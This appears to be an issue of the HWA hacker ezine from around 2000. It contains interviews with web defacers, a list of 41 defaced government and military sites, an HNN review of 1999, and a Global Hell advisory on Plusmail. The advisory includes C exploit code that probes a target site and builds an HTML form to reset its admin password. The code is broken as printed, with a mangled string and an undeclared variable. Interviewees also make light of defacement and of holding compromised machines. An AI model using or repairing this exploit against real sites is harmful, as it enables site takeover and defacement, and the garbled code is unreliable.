hehhe > :))) which is good.. coz that shit is too easy.. 
> heh > I ain't a shitty admin afterall > :))) no you're not heh > hehe > :)) if you ever need any rewted korean bawx's let me know ;) got plenty heh > :))))) > :P > Is there any1 on the scene that U trully admire !? hmm yeah.. i have a lot of respect for Erik B. > that's the dewd that sings with rakim !? !?! > :))) also peter Shipley no.. i meant.. bloodaxe eric bloodaxe > oh, ok and also Peter Shipley from dis.org > ooooohhh that dude's a mad coder also.. 1 more dude.. for sure.. > that is .... !? i have a lot (and i do mean a lot) of respect for aempirei aka.. ambient empire he's a good friend.. and a bad ass coder as well as well as XXyla.. (yes.. a chick).. she's bad ass when it comes to fones > aaight and another chick ;) named crow (she can code..) > any1 U hate !? not really.. > not hate > just don't like i don't really "hate" or dislike any 1 i accept every 1 for who they are no matter the skill level > kewl > CAn I ask a personal q !? as long as they're straight up with me.. i'm always straight up with them sure.. go ahead > U going on a party for New year's eve !? > :))) uhmm.. probably not > not ?!?! nah > why is that !? i dunno > well...ok > just don't get mad drunk > and try to hack www.fbi.gov i'd rather be with my ex-.. but since she doesn't want me any more.. > :( oh well heh probably sit around and deface shit > :P j/k > :))))) or.. maybe not.. ;) > :) who can tell > "US government says: Hackers give us a brake" > Will U givem a brake! ? hmm yeah i'll give 'em a break me breakin' my foot off up in dat ass heh.. seriously.. tho > :))) yeah.. i'll leave 'em alone > aaight coo > Ok > the editor is gonna kill me now > I'm way over the limit with this why's that? oh.. heh > Any shouts U wanna give what's their page again? uhmm.. sure.. > of the ezine !? > welcome.to/hwa.hax0r.news much luv to: xxyla, aempirei, cristyn, vghk, f0bic, flipz, and nostalg1c > aight > thanx for the interview bro > keep it real on show them what's hacking all about but.. 
u don't have to put that if u don't want to.. but if u do.. definitely to them.. ;) aight plan on it and thanks for your time as well.. ;) > peace out

-----------------------------------------/* end interview /*-----------------------------

defaced sites:

[99.10.27] NT [fuqrag] Commander, Helicopter Tactical Wing, U.S. Atlantic Fleet (eagle.chtwl.spear.navy.mil)
[99.10.27] NT [fuqrag] Naval Surface Warfare Center, Carderock Division (scotty.navsses.navy.mil)
[99.10.27] NT [fuqrag] Commander Submarine Force U.S. Pacific fleet (www.csp.navy.mil)
[99.10.27] NT [fuqrag] Defense Information School (www.dinfos.osd.mil)
[99.10.27] NT [fuqrag] Federal Mediation and Conciliation Service (www.fmcs.gov)
[99.10.27] NT [fuqrag] Marine Corps Base, Hawaii (www.mcbh.usmc.mil)
[99.10.27] NT [fuqrag] Naval Security Group Activity Pensacola (www.nsg.navy.mil)
[99.10.27] NT [fuqrag] U.S. International Trade Commission (www.usitc.gov)
[99.10.28] NT [fuqrag] Dairy Queen (www.dairyqueen.com)
[99.10.28] NT [fuqrag] U.S. Minerals Management Service (www.mms.gov)
[99.10.28] NT [fuqrag] TriStar Computers International (www.tristar.com)
[99.10.29] NT [fuqrag] U.S. Office of Personnel Management (apps.opm.gov)
[99.10.29] NT [fuqrag] #2 U.S. Minerals Management Service (www.mms.gov)
[99.10.30] NT [fuqrag] California State Assembly Democrats (democrats.assembly.ca.gov)
[99.10.30] NT [fuqrag] Domino Server for the Office of Civilian Radioactive Waste Management (domino1.rw.doe.gov)
[99.10.30] NT [fuqrag] Space Shuttle Flight Tracker, Johnson Space Center (flight.jsc.nasa.gov)
[99.10.31] NT [fuqrag] (ncr) DISA (dssg-web-srv.ncr.disa.mil)
[99.10.31] NT [fuqrag] City of Fresno Gov (gw.fresno.gov)
[99.11.02] NT [fuqrag] Defense Commissary Agency (www.deca.mil)
[99.11.02] NT [fuqrag] U.S. Navy Electronic Commerce Homepage (www.ec.navsup.navy.mil)
[99.11.03] NT [fuqrag] Naval Medical Research Institute (www.nmri.nnmc.navy.mil)
[99.11.06] NT [fuqrag] Office of Small & Disadvantaged Business Utilization, Department of Transportation (osdbuweb.dot.gov)
[99.11.11] NT [fuqrag] PWD Malaysia (corp.jkr.gov.my)
[99.11.11] NT [fuqrag] Ministère de l'Environnement et de l'Énergie de l'Ontario (ene.gov.on.ca)
[99.11.11] NT [fuqrag] Chinese Ministry of Foreign Affairs (fmprc.gov.cn)
[99.11.11] NT [fuqrag] Taipei Government (intra.taipei.gov.tw)
[99.11.12] NT [fuqrag] Belgium Ministry of Economic Affairs (mineco.fgov.be)
[99.11.12] NT [fuqrag] Supremo Tribunal Federal (www.stf.gov.br)
[99.11.12] NT [fuqrag] Shj Library, Saudi Arabia (shjlib.gov.ae)
[99.11.12] NT [fuqrag] Singapore Government Shopfront (shop.gov.sg)
[99.11.14] NT [fuqrag] Unreal Web site (www.unreal.com/index2.html)
[99.11.22] NT [fuqrag] IntelSat (www.intelsat.int)
[99.11.22] NT [fuqrag] #1 NATO Airborne Early Warning and Control (www.naewfc.nato.int)
[99.11.22] NT [fuqrag] Supreme Headquarters Allied Powers Europe (SHAPE) (www.shape.nato.int)
[99.11.23] NT [fuqrag] Atlantic Council of the United States (www.acus.org)
[99.11.23] NT [fuqrag] Council of Europe Convention (www.coe.fr)
[99.11.23] NT [fuqrag] John Romero's Ion Storm (www.ionstorm.com)
[99.11.23] NT [fuqrag] Canopus Corporation (www.justedit.com)
[99.11.24] NT [fuqrag] Hemp Cat (www.hempcat.com)
[99.11.25] NT [fuqrag] Asia-Pacific Economic Cooperation (www.apecsec.org.sg)
[99.11.25] NT [fuqrag] Kingston Technology Corp (www.kingston.com)

Total Defacements: 41 - defacement list provided by attrition.org

Slash is an HWA correspondent, email him at smuddo@yahoo.com
cc: your comments to cruciphux@dok.org

  @HWA

07.0  Interview with sSh member YTcracker Jan 10th 2000
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      HWA Exclusive. You may reproduce this if credit is given for the
      source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate.
ytcracker is a member and founder of the 'new' sSh 2000 hacking group (Sesame Street Hackers, formerly run by dap) and has defaced many websites in recent months. You can see mirrors of his work on Attrition.org, a site that archives web defacements.

The IRC interview:

Session Start: Mon Jan 10 12:07:23 2000
[12:07] yo So you up for an interview now?
[12:07] hit it ok cool
[12:07] *grammar mode on* *g*
[12:07] leave the channel
[12:07] go back
[12:07] get ops ok
[12:09] back to the task at hand
[12:09] haha oky lets get some basic history, how old are you and how long have you been on the internet? you can refuse to answer any questions btw :)
[12:09] i'm 17 and five months, been on the inet since i was six. do you code in any languages and do you take computer courses at school? or are you self taught?
[12:10] i'm completely self-taught and i hate school
[12:10] haha you've cracked a good many sites, do you use your own exploits or scripts from others?
[12:11] i code in a load of languages but my strongest skills are probably in cpp and vb.
[12:11] i use other peoples stuff mostly
[12:11] msadc is probably what made me NoToRIOUs
[12:11] hahah
[12:11] i do know how to code in core x86 assembler would you consider yourself a 'Script Kiddie" then?
[12:12] i wouldn't, no a cracker?
[12:12] a defacer
[12:12] well, former defacer
[12:12] i don't even really take part in that much anymore when you were defacing, what was the main reason behind it? just because you could? or boredom? or fame? or some other reason(s)?
[12:13] i wrote an article detailing my motives
[12:13] i would argue it was a mix of a lot of thing
[12:13] i didn't intend for the media to take any interest yes you did, It was on HNN but that was a while ago.
[12:14] yea
[12:14] hahahah
[12:14] i gotta do my laundry ok wanna continue later?
[12:14] haha no go ahead
[12:14] i was reminding myself k I was wondering about sSh, what plans do you hold for the 'group'?
[12:15] i don't really know anymore
[12:15] i've been writing a lot of code for pure-security what kind of code?
[12:15] exploits and automation tasks
[12:15] i wrote a spammer for mosthated
[12:15] hahahah hehe how is your relationship with mosthated? what did you think of his 20/20 appearance?
[12:16] mosthated is really cool
[12:16] i think that it's the media's editors that made him look like a hoodlum
[12:17] more or less many people seem to dis him simply coz he's been on tv and such, I guess its cool to dis 'famous' ppl in the scene.
[12:17] i think it's a combination of jealousy agreed
[12:17] and envy plus it makes you look cool to dis someone that is well known.
[12:17] "Freedom of the press is limited to those who own one."
[12:18] hahahah perhaps yeah I like that quote
[12:18] i will agree that what i did requires no *real* skill
[12:18] then again ./wow doesn't either is there anything you'd like to say to 'aspiring crackers' out there? since many newbies seem to think defacing is something to aspire towards
[12:19] i'd like to say it isn't really worth it
[12:19] for a while, it is so you change your mind from your article on HNN?
[12:19] it's like graffiti very much
[12:19] no no
[12:19] let me explain ok
[12:19] i go out and paint still
[12:19] bombing is something that i like to do
[12:20] but it is illegal
[12:20] the ends DO justify the means
[12:20] but only if you are fighting for something worth fighting for
[12:20] not
[12:20] "i luv my girl, peaz"
[12:20] you can tell her that
[12:20] you can't tell the world the plight of the chechyans
[12:20] or tell the world about the government's weak security Have you ever been raided or fear that you may be? I heard rumours but they were unconfirmed
[12:23] nah
[12:23] i ducked it successfully
[12:23] i hope
[12:23] haha were you contacted by any law enforcement officials or security personnel? or did they not 'find' you?
[12:24] didn't find me heh whats your opinion on Kevin Mitnick?
(nearly done btw) :)
[12:26] one sec k
[12:27] on the fone
[12:27] heheh ok feds? lol
[12:27] hahah no ;)
[12:27] angry fone marketers fucking hate them
[12:27] yea they are dumb
[12:27] i think that kevin mitnick is being unjustly held
[12:28] i mean
[12:28] murders don't spend that much time what about internet criminals in general?, the sentences being handed down to people like Zyklon, with restrictions on computer use after the jail term is up etc? do you think its fair?
[12:29] for the most part people fear what they don't understand
[12:29] therefore
[12:29] computer crime is probably the most unjustly punished crime the fedz (etc) need to be more educated.
[12:29] these kids deserve to be behind a sesk
[12:29] desk*
[12:29] not bars
[12:29] yea totally nod
[12:29] clinton started a brilliant initiative
[12:29] that i hope other politicians carry on which was this?
[12:30] as far as educating young minds
[12:30] the $91 million internship program with the government
[12:30] headed here in colorado springs ah ok any last words you'd like to impart? or greets?
[12:31] not really ok
[12:31] just keep things pure
[12:31] stop the shit talking
[12:31] and focus on unity want to plug any sites?
[12:32] www.felons.org/son aiight, thanks for your time, and stay free! ;-)
[12:32] you too
Session Close: Mon Jan 10 12:33:01 2000

@HWA

08.0 Interview: Mosthated gH (Global Hell) Jan 10th 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Exclusive. You may reproduce this if credit is given for the source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate.

mosthated is a member/founder of the hacker group Global Hell (gH) and was recently featured in a spot on the television editorial show 20/20.

ABC Coverage: http://www.abcnews.go.com/onair/2020/2020_991220_hackers_feature.html

Squaring Off With ‘Global Hell’
20/20 Looks at FBI Efforts to Combat Teenage Hackers

[Photo caption: Patrick Gregory is one of the founders of Global Hell, an online gang of several dozen of the most active and notorious teenage computer hackers on the Net. Gregory says he has stopped hacking. (ABCNEWS.com)]

ABCNEWS.com

Dec. 20 — Young cyber whizzes with knowledge to infiltrate the most secure computer systems in the world are growing in numbers and ability. Faced with growing security threats to government and commercial Web sites, the Justice Department is no longer sitting by idly.

On 20/20 Monday, Brian Ross takes a look at some members of “Global Hell,” an online gang of several dozen of the most active and notorious teenage computer hackers on the Net, and the FBI’s efforts to delete these hackers from cyberspace.

Global Hell members have disrupted such Web locations as the Department of Defense and the telephone company Ameritech, and they have forced the White House Internet access to be closed down for two days.

“I don’t understand why they look at us as such bad people,” 19-year-old Patrick Gregory says. Gregory is one of Global Hell’s founders.

Government Wary of Hackers

Hackers, now with their own conventions and magazines, see themselves as artists or pranksters at worst. But the federal government says there are plenty of reasons to fear the damage that could be caused by hackers.

“If you deface a Web site of a company that is making $18 million dollars a day, you are committing a pretty serious crime,” says Assistant U.S. Attorney Matthew Yarbrough, a member of the federal government’s Cyber Crimes Task Force. “We can’t treat this problem as if it’s just kids.
Everyone has to start taking this very seriously.”

Eric Burns is the 19-year-old who infiltrated the White House computer system and briefly posted the Global Hell’s logo on the site. Burns’ action forced the Secret Service to cut off White House access to the Internet for two days. Burns, of Shoreline, Wash., pleaded guilty in federal court last month. He was sentenced to 15 months in prison and ordered by a judge not to touch a computer for three years.

Hacking Easier

Another reason to fear these juvenile cyber surfers is that potentially damaging software is getting easier to handle. With viruses available for downloading from the Web, extensive computer language knowledge is no longer needed.

Because of the growing threat of cyberterrorism, the federal government has committed more than a billion dollars to go after computer hackers.

“If they penetrate a computer system with intent to defraud, or the intent to sabotage it or, or to steal proprietary information, yes, that’s a federal crime,” assistant special agent in charge of the Dallas FBI office, Bob Garrity, tells 20/20. “It is a serious crime and it’s a growing crime.”

But the hackers say they are protecting government property by exposing its vulnerabilities. “This war between hackers and the FBI has been going on for years. … It’s not going to stop any time soon,” says Gregory, who says he has stopped hacking.

-=-

The IRC interview:

Session Start: Mon Jan 10 15:50:41 2000
[15:50] DONE. ok ready to go now then?
[15:51] Sure. ok first off you don't have to answer questions if you don't want to. Ok here goes... how old are you now and how long have you been on the internet?
[15:53] I am 19 years of age, been online since about 10 or 11 years old. did you take any computer courses at school or would you consider yourself self-taught?
[15:53] Self taught. how did you 'get into' computers?
[15:54] My family was computer literate, my mother did a lot of typing, i got interested that way.
you've defaced websites in the past, what was your reason for doing it? or reason(s)
[15:55] None, it was stupid, i would never do it again. so it was for fun? or fame? or just for peer recognition?
[15:55] supposedly helping with security, it did nothing but get ourselves in trouble.
[15:55] recognition/fame/help i guess would sum it up. what group(s) have you been a member of in the past?
[15:56] gH
[15:56] =] :) what is your current view of 'hacking groups' ?
[15:57] Pathetic, skillLess, dead in a few weeks. do you think they are mostly "script kiddies" ?
[15:59] Yes.
[15:59] maybe you should read my advisory ok you were recently profiled on 20/20, what do you think of the reaction from 'scene' people regarding this and what do you think of how it was presented?
[16:02] I have no comment. ok you run pure-security.net which is a well put together site for security related material do you hope to make a career in the security field?
[16:05] Yes, hopefully with a large organization to track down people like these kids who break into stuff for fun. ok i'll cut this short now then, do you have any final words you'd like to say?
[16:06] Everything i wished to express is in the vulnerability. ok thanks for your time and take care
[16:07] =] tnx
[16:07] i held in my anger. short and sweet why anger?
[16:07] i hate script kids. ah
[16:07] as you can see in our release. yeh I just read it
[16:07] script kid ethics caused us to get fucked.
[16:08] if were would have done what we are doing now, 3 years ago.
[16:08] we would be millionaires.
[16:08] starting security businesses, offering services. I can understand that
[16:08] yet, we ./hacked websites.
[16:08] dumb dumb dumb. its a trap many people get caught up in the allure of the forbidden
[16:09] yeah
[16:09] me and gH climbed out.
[16:09] now we are to piss down inside and shut it closed. the site is looking pretty good, are you getting a lot of hits? who designed it?
[16:11] dishwater
[16:11] we are doing a millennium design.
[16:11] finally get a more professional look.
[16:11] plus i started www.pure-children.net whats that about?
[16:12] Educating children and families on?
[16:12] "Educate your Future"
[16:12] Computer related issues. cool
[16:12] internet, help, anti child porn, ect. is that up now? ah just checked, it, coming soon. who's behind that? just yourself or do you have help?
[16:13] myself right now. you're going to be busy in the future then :) any other plans? like are you working now or are you continuing your education? it seems you can't get far these days without those bits of papers (certs etc)
[16:16] neither.
[16:16] i'm learning by myself. thats commendable if you ever feel like writing any articles or diatribes etc consider sending them to me and i'll put them in the zine. Just something to keep in mind. :) have you read any of our stuff?
[16:19] yeah, i seen my name and group used in it before. heh oky i'll let you go now then, once again thanks for your time dude take it easy
[16:22] no problem.
Session Close: Mon Jan 10 16:22:35 2000

@HWA

09.0 Mosthated/gH advisory Jan 10th 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Submitted by Mosthated, gH

/*
  [gH-plus.c]

  title: [gH plusmail vulnerability]
  author: ytcracker of gH [phed@felons.org]
  comments: plusmail is an extremely popular cgi-based administration
  tool that allows you to take control of your website with a graphical
  control panel interface. the password file, however, is set with
  permissions rw enabled, therefore granting the authority to change
  the password whenever's clever. the following code will detect the
  vulnerability and generate the required html to exploit.
  found by: herf@ghettophreaks.org
  shouts: seven one nine. all of gH.
*/

/*
  [gH Security Advisory]

  Date: 1-10-2000
  written by: mosthated of gH (most@pure-security.net)
  vulnerable: Remote Vulnerability in Plusmail. So far, any environment running Plusmail.
  report: Noticed plusmail running on multiple operating systems. The vulnerability lies in the web based tool, which now that is easily exploited, gives you "ADVANCED CONTROL" of a target website. Below is the code by ytcracker of gH, which demonstrates how easy it is to generate the html code which is executed by your web browser to compromise the target host. We have noticed this Plus Mail program is widely used, but have yet to succeed in finding the main site for Plusmail to acknowledge the developers of the remote vulnerability.

  Most likely this will be ripped out during the online trading, because of script kids not liking this factual addition, but nevertheless, it will be expressed. This exploit was written to acknowledge security weaknesses, but in no way promotes web page defacements. If you further use this program to gain access to anything not normally accessible by yourself, meaning you script kids, then you are subject to be prosecuted and even get 10 years in prison. Is it honestly worth it to compile this program and randomly ./hack sites and deface them with this half way automated program to put your nick & group on it? The answer is NO.

  gh/global hell.. Heard of us?? Seen us on TV?? Read about us?? Most likely.. We've changed and gained knowledge from the experience....Been there done that.. The IT professionals didn't believe that a group like this could completely go legit, the media figured we would retaliate against the fbi and the world was scared by misleading media articles and television specials about how we are terrorists and destructive teens. I ask the world now, who is helping who? Did the media find this vulnerability? Did the stereotypist who label us as "cyber gang members" find this vulnerability and allow networks around the world to be patched before us so called "destructive hackers" gained access to them. Answer yet again, NO, we did, not you who falsely claim to be helping with security.
  Your defacements don't help anything, we thought it did before as well, now we realized that it does nothing positive. You stereotypist know nothing about gH, yet can write articles, you're wrong. You people think you know so much about hackers. You know nothing, what you think you know, is wrong. What you don't know about us, the information is right under your nose, yet you still can't put your finger on it. There are 2 sides to the so called "hacking scene", you people should realize there will always be a good and a bad side to most matters. Don't exploit the fact that you don't know anything about the good side, so you initialize a media free for all on the bad side of what you have no idea about. Just face the real fact, our knowledge could be a great help to all, why not accept us as normal people, not based on some untrue off the wall assumptions.

  If you use programs like this to deface sites, think before you use this one, because we have been through the childish fights online and expressed our feelings, we were still where we started, from square 1 and would not have gone any farther, until we realized that what we were doing was stupid, pathetic, futureless and illegal. Choose your path wisely, either stop the script kiddie bullshit or get your door kicked in, you decide.

  fix: Move/Rename the plusmail directory, sorta how you get around RDS.

  Respect: cDc, l0pht, ADM, w00w00, www.ussrback.com (UssrLabs), all of gH and the people/groups/agents/officers/admins/families/children/presidents parents/senior citizens who gave gH a hard time about the childish things we did. Respect well worth it on a level finally reached to succeed helping with security & pushed to be legit and turn our lives around.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
  int sock;
  int n;
  unsigned long vulnip;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  char *detect;
  char buffer[1024];
  char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
  char htmI[]="[gH plusmail exploit]

username:
password:
retype password:

pure-security networks

";
  FILE *html;

  printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");
  if(argc<2)
  {
    printf(" usage: %s [vulnerable website]\n\n",argv[0]);
    exit(0);
  }
  /* resolve the host name given on the command line */
  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }
  vulnip=inet_addr(argv[1]);
  vulnip=ntohl(vulnip);
  sock=socket(AF_INET, SOCK_STREAM, 0);
  memset(&sin, 0, sizeof(sin));
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);
  /* stop if the web server cannot be reached */
  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {
    perror("connect");
    exit(0);
  }
  /* request the plusmail cgi and read the start of the reply */
  send(sock, plusvuln,strlen(plusvuln),0);
  n=recv(sock, buffer, sizeof(buffer)-1,0);
  buffer[n>0?n:0]='\0'; /* recv() does not terminate the buffer for strstr() */
  detect = strstr(buffer,"404");
  close(sock);
  /* a 404 anywhere in the reply is taken to mean plusmail is not installed */
  if( detect != NULL)
  {
    printf(" vulnerabilty not detected.\n");
    exit(0);
  }
  else
    printf(" vulnerability detected. generating html...\n");
  html=fopen("plus.html","w+b");
  if (html == NULL)
  {
    perror("fopen");
    exit(0);
  }
  fprintf(html,"%s",htmI);
  fprintf(html,"%s",argv[1]);
  fprintf(html,"%s",htmII);
  fclose(html);
  printf(" spawning lynx...\n");
  system("lynx plus.html");
  return 0;
}

@HWA

10.0 HNN's 1999 Year In Review 12/26/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

1999 has been a whirlwind year for the underground community and HNN. We have searched through the archives and came up with what we thought were the biggest news stories we reported on in 1999. Since HNN tends to cover very different stuff from the mainstream our list is a little different from everyone else's. If you missed a day or two of HNN over the last year you should take a look at our top ten (really it is eleven) news stories of 1999.

1999 Year In Review
http://www.hackernews.com/special/1999/99topstories.html

HNN: The Year in Review 1999

Nineteen Ninety Nine was an exciting year that saw explosive growth for HNN and our ever continuing battle against Fear, Uncertainty, and Doubt (FUD). While some of our engagements with FUD have been successful, like the alleged moving of a British satellite, other battles like the numerous virus scares, were not.
1999 also saw some major events unfold in the underground community, from the exposure of Se7en as a fraud, to the removal and resurrection of Packet Storm Security, and the debacle of MTV. At the close of the year Kevin Mitnick is awaiting release while others take his place behind bars. Throughout 1999 HNN was the place on the net to get up to date breaking news on these stories. These top eleven stories of 1999 are not presented in any particular order.

LoU China-Iraq War

On December 29, 1998 the underground group Legions of the Underground declared an all out cyber warfare on information infrastructure of China and Iraq. They cited severe civil rights abuses by the governments of both countries as well as the sentencing to death of two bank robbers in China and the production of weapons of mass destruction by Iraq as the reasons for their declaration.

By January 5th, 1999 a group known as spl0it and a group based in Poland said that they would assist LoU in their cyber warfare efforts. On January 6th, 1999 Legions of the Underground released a statement contradicting their earlier statements, claiming that they never had destructive intentions and blaming the media for letting this get out of hand.

The retraction by LoU came too late. On the next day, January 7th, 1999, an International Hacker Coalition including groups such as cDc, L0pht, CCC, 2600, Phrack, !HISPAHACK and others released a joint statement condemning the Legions of the Underground and their Declaration of War. By January 8, 1999 LoU was reeling from the overwhelming support of the joint condemnation of LoU's actions and released additional retractions of their declaration of war.

On January 13, 1999 the Legions of the Underground told Wired magazine that the original press conference was a fake and that the people present during the press conference were spoofed. There is no evidence to support this but there is none to deny it either.
Finally Optiklenz, a member of LoU, releases a statement on the view of what happened from the LoU perspective.

LoU-China-Iraq War Histogram - Chronological Listing of Events
http://www.hackernews.com/special/1999/louwar/louhist.html
HNN Archive for December 29, 1998
http://www.hackernews.com/arch.html?122998
Transcript of IRC Press Conference with LoU
http://www.hackernews.com/special/1999/louwar/louirc.html
LoU Declaration of War
http://www.hackernews.com/special/1999/louwar/lou1.html
HNN Archive for January 6, 1999
http://www.hackernews.com/arch.html?010699
International Hacker Coalition Joint Statement
http://www.hackernews.com/special/1999/louwar/jointstat.html
LoU Retraction of War Declaration
http://www.hackernews.com/special/1999/louwar/loustat.html
Optiklenz Statement
http://www.hackernews.com/special/1999/louwar/legspeak.html

Hackers Move British Military Satellite

This is one battle with FUD that we like to claim that we won. On March 1, 1999 The Sunday Business published a story, later picked up by the Reuters wire service, that a British military satellite had been taken over by cyber attackers and was being held for ransom. The story itself lacked any sort of verifiable information and HNN called it into question immediately. By the next day spokespeople from the British Ministry of Defense flat out denied that such a thing was even possible.

HNN editor Space Rogue was a guest on the radio show "Off the Hook" to discuss this incident. Both ZDNet and MSNBC ran stories covering this non event crediting HNN for calling the story suspect. Bob Sullivan of MSNBC went so far as to label HNN "The Voice of Reason".

HNN Archive for March 01, 1999
http://www.hackernews.com/arch.html?030199
HNN Archive for March 02, 1999
http://www.hackernews.com/arch.html?030299
Original Sunday Business Article
http://www.hackernews.com/special/1999/sundaybusiness.html
Security Analysis of Satellite Command and Control Uplinks - Buffer Overflow Article by Brian Oblivion
http://www.hackernews.com/bufferoverflow/99/satcom.html
MSNBC
http://msnbc.com/news/245713.asp
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2217730,00.html
Off The Hook - March 02, 1999 episode
http://www.2600.com/offthehook/rafiles99/030299.ram

Se7en Exposed

An article written by Steve Silberman and published by Wired exposed Se7en (Christian Valor) and his single handed cracker crusade against pedophiles as a complete sham. Se7en succeeded in creating a massive media hack as articles of his infamous exploits were published in Forbes, MSNBC, LA Times, Newsday and others over several months. Only one of the journalists duped by Se7en that we know of, Adam Penenberg, actually admitted his mistake and published a public apology.

HNN Archive for February 8, 1999
http://www.hackernews.com/arch.html?020899
Attrition.org - Evidence used against Se7en
http://www.hackernews.com/arch.html?020899
Wired
http://www.wired.com/news/culture/0,1284,17789,00.html
Open letter from Adam Penenberg
http://www.hackernews.com/special/1999/penenbergletter.html

John Vranesevich Shuts Down Packet Storm Security

Probably the biggest story of 1999 was the actions of John Vranesevich, founder and administrator of AntiOnline, who was instrumental in getting the extremely popular web site Packet Storm Security shut down. As far as can be determined John Vranesevich discovered a private directory on Packet Storm that contained potentially libelous material about him and his family. Mr.
Vranesevich did not contact the site administrator directly but instead sent an email to the administrators at Harvard University asking that the objectionable material be removed. Harvard responded by unceremoniously pulling the plug on the whole site.

Once word of how and why Packet Storm had gone down spread, a public outcry ensued. Mailing lists were started, people started an attempt to mirror the site, Ken Williams received numerous offers to host the site and Mr. Vranesevich became the whipping boy du jour.

Because Mr. Williams was unable to access his web site, which was his senior project, he was forced to drop out of school. He later sold the web site to Kroll O'Gara and took a position at a major internet security company.

HNN Archive for July 1, 1999
http://www.hackernews.com/arch.html?070199
HNN Archive for July 2, 1999
http://www.hackernews.com/arch.html?070299
Attrition.org - Examples of the supposedly libelous materials posted to Packet Storm
http://www.attrition.org/negation/image/vran.jpg
Ken Williams Statement
http://www.hackernews.com/special/1999/pss/williams.html
AntiOnline - John Vranesevich's Defense
http://www.antionline.com/archives/editorials/packetstorm.html
Letter from Harvard
http://www.hackernews.com/special/1999/pss/harvard.html
Ken Williams Response to Harvard
http://www.hackernews.com/special/1999/pss/kenresponce.html
Letter From Bronc Buster - Regarding the actions of Mr. Vranesevich
http://www.hackernews.com/special/1999/pss/broncjplet.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2287456,00.html

HNN Pulls Massive April Fools Joke

It was meant as a simple joke, a simple April Fools Day prank, a reason to smile or to laugh. It turned into one of the biggest stories in the underground for 1999. At midnight EST on April 1, 1999 the main Hacker News web page was updated with what appeared to be a web defacement. The page contained all the required elements of a defacement: poor spelling, hax0r speak, shout outs, etc...
Many, many people bought the defacement hook, line and sinker; HNN administrators even got personal phone calls to their homes at 8am to inform them of the defacement. Remember, even as recently as April web defacements were a relatively rare thing, not occurring by the dozens like they are today.

Ahhhh, but the fun did not stop there. At Noon EST the HNN pranksters felt the unsuspecting public needed even more mayhem and hijinks. The defaced page came down and the day's news went up. The news contained stories such as Kevin Mitnick breaking out of jail by whistling a 300 baud carrier into a phone, L0pht Heavy Industries selling L0phtCrack for $1.2 billion to NAI, CERT going out of Business, and Microsoft buying Network Solutions for complete control of the Internet. Considering the volume of mail we received regarding these stories (some of which came from mainstream journalists) many many people believed them.

Archive of HNN Defacement
http://www.hackernews.com/defaced/1999/HNN/crack.html
HNN Archive for April 1, 1999
http://www.hackernews.com/arch.html?040199

(WE didn't fall for this though!, hehe - Ed)

PhoneMasters

For some reason the mainstream media has really not paid attention to this story. Considering the level to which these crimes escalated and the methods and effort needed to catch these crooks it is a wonder that there wasn't more media coverage.

The FBI called them the 'Phone Masters' and labeled their crimes as one of the greatest cyber-intrusions of all time. Court records show that the Phone Masters had gained access to telephone networks of companies including AT&T Corp., British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun & Bradstreet.
They could eavesdrop on phone calls, compromise secure databases and redirect communications; they also had access to portions of the national power grid and air-traffic-control systems.

The FBI had to invent special equipment they called a 'data tap' specifically for this case and get special permission from DOJ to use it. It took several years of listening to phone calls to gather enough evidence for an arrest but on February 22, 1995 the FBI conducted a raid on three suspected members of the PhoneMasters. Other members of the group are thought to remain at large.

Three members of the group pleaded guilty to federal charges of one count of theft and possession of unauthorized calling-card numbers and one count of unauthorized access to computer systems. The three were sentenced in October to 24 to 41 months in federal prison.

What bothers us most about this story is that almost no mainstream media has reported on the story. The first mention we can find about the Phone Masters is from a local TV station, WFAA in Dallas/Fort Worth, back in the beginning of May.

Phone Master Hacks - Buffer Overflow Article
http://www.hackernews.com/bufferoverflow/1999/phonemasters.html
HNN Archive October 4, 1999 - PhoneMasters Plead Guilty
http://www.hackernews.com/arch.html?100499
Wall Street Journal - one of the few articles about this case
http://www.zdnet.com/filters/printerfriendly/0,6061,2345639-2,00.html
Union Tribune - Another rare article that has a little bit more info.
http://www.uniontrib.com/news/uniontrib/sun/news/news_1n5hacker.html
CNN - Tries to answer why the media missed the boat
http://www.cnn.com/1999/TECH/computing/12/14/phone.hacking/index.html
Aviary Mag - Interview with An Acquaintance of the Phone Masters
http://www.aviary-mag.com/Martin/The_Phonemasters_And_I/the_phonemasters_and_i.html

MTV

Serena Altschul, host of MTV News and of a documentary style program known as 'True Life', wanted to do a show on 'hacking' and in particular a show about Kevin Mitnick.
She was placed into contact with Emmanuel Goldstein of 2600 Magazine who organized several interviews for her. He spent a lot of time and effort in getting good people for her to talk to and they shot several hours worth of film.

For one reason or another the Kevin Mitnick aspect of the show was cut out, so being a good sport Emmanuel directed Serena to the folks at L0pht Heavy Industries. The L0pht crew made time in their busy schedules to spend an entire day with Serena and her film crew explaining the finer points of what they do and explaining the difference between script kiddie defacements and true hacking.

